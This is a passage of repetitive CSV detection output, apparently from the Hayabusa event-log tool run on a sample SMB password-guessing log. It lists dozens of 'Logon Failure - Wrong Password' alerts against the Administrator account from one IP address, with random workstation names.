NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZy2YJPOg1YZ2bd0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUE6E9H9i0l0P7Jp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Pkpt2nmRorQ3x0o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCZNNzSyi4mLLaxZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O9ZqF43sDjSirvMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XOw9DjHISDX57XUe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rmxFpEQeGsgbXpDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfIVCOOWQS7TNKQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uweLaLhvznDee1IF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oNQcS2BonF12ikiX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D43Flf2keSL3aph6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zw7nJXNHZ2QNa3In : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UZp4567BIWAwxF9r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9iVvPuykq62pV9z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRVomETC34InuKPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VpHfjKgAxChSYz8R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tIbTy5IDRy90lbUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mM6Olq0zYkMlwmrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUehtGEh0EqRHiLP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhZ2KHmCTonGrXSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZea5qiet7vrT3iv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNWY8kuJMSy8h0Zk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bt9DUQ0mwhkJlTt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zXYtsM2MMuNSYtVr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgzvsdMN2SU7Knlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxiBYXNCY32yNb6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVfJmOxvsp75g3a0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHp1hlHjD8w3WKt3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEeJWAJgOeueYSM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tOfPGoUXu932L80d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NbH4R6GK1PIVT3ij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgsJokRd07Nh1lO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 11ylyxQyV5HCJ18g : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Am2qI1ya4wYdqErV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2AmZsYUYmDpWZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c0Hd8xWxOxFifJBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlh64Gtfoig2uzOY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LtK8Hj2kf3dfFSnW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VKUPqxtNqkVqXgTg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SKSxp87CBg8L8wSi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CpvxvR0ftQs1gdEF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9RGDzNMt9fM6rLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvOO9NLhbbKJXQq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mDB9bIx7LcoJ6IAU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfJWsGqlQTmFUUPT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9PRIO3MASsjrdQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9QCn4nZHB0ENeA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4iUNHB1gE2d1dBfZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tM3IdtrLdVXQjOjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dbmn9Er9e1JZZybc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SY40ARcAoo9cWQIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fc7m0blzidQfn1BU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13SkGPbDDXou7qLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YIlJeZpJlvcKgqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BRhH6atcwLcGmrB4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGIInLsy4UCfl0oW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qJ7nEN0u9DkVuVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6qb85lEENmrj4ebF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6RXAj26rnxMmxuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tas7cqRNGQw6FlVX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQlF8GYIeWytFLsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dj48ftx52s1HntRT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B46vTS9PxUgUblBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoIFbywJEC0QaceV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSXqaP0i1eeKQOmX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gke4vfzIAC3k0yXU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZnjxfeIX4ra6vmBA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ChR30FLLOT3Pvapv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VkepVf00vkpVp9yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5i2AxYxwCX6DvP3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8Fvcw2mQBI61mxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAazyOpBig2G3Z78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1g3rjPQQAXEK2yz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BC68zrAEF6L00xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8xD2aZArxVdrO6fG : IP Address: 192.168.198.149 : AuthPackage: 